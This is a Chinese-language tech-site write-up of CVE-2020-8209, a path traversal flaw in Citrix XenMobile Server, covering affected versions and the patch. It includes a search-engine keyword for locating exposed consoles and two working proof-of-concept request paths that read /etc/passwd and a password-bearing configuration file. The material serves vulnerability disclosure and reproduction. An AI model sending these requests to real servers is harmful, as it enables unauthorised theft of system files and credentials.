溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

XenMobile中CVE-2020-8209漏洞的示例分析

發(fā)布時間:2021-12-28 17:33:35 來源:億速云 閱讀:127 作者:柒染 欄目:安全技術(shù)

這期內(nèi)容當(dāng)中小編將會給大家?guī)碛嘘P(guān)XenMobile中CVE-2020-8209漏洞的示例分析,文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。

1、漏洞介紹

XenMobile是Citrix開發(fā)的企業(yè)移動性管理軟件,該產(chǎn)品允許企業(yè)管理員工的移動設(shè)備和移動應(yīng)用程序,該軟件的目的是通過允許員工安全地在企業(yè)擁有的和個人移動設(shè)備及應(yīng)用程序上工作來提高生產(chǎn)率。CVE-2020-8209,路徑遍歷漏洞。此漏洞允許未經(jīng)授權(quán)的用戶讀取任意文件,包括包含密碼的配置文件。(該軟件國外居多,國內(nèi)基本很少)

2、漏洞版本

RP2之前的XenMobile服務(wù)器10.12
RP4之前的XenMobile服務(wù)器10.11
RP6之前的XenMobile服務(wù)器10.10
10.9 RP5之前的XenMobile服務(wù)器

3、漏洞復(fù)現(xiàn)

1.通過空間引擎關(guān)鍵字

"XenMobile控制臺"

XenMobile中CVE-2020-8209漏洞的示例分析

2.POC驗(yàn)證漏洞

/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd

/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties

XenMobile中CVE-2020-8209漏洞的示例分析

XenMobile中CVE-2020-8209漏洞的示例分析

4、漏洞建議

官方補(bǔ)丁刪除了/opt/sas/sw/tomcat/inst1/webapps/ROOT/jsp/help-sb-download.jsp

上述就是小編為大家分享的XenMobile中CVE-2020-8209漏洞的示例分析了,如果剛好有類似的疑惑,不妨參照上述分析進(jìn)行理解。如果想知道更多相關(guān)知識,歡迎關(guān)注億速云行業(yè)資訊頻道。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI